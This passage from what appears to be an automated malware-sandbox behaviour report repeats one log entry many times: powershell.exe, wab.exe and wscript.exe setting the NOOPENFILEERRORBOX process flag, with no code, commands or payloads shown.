          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
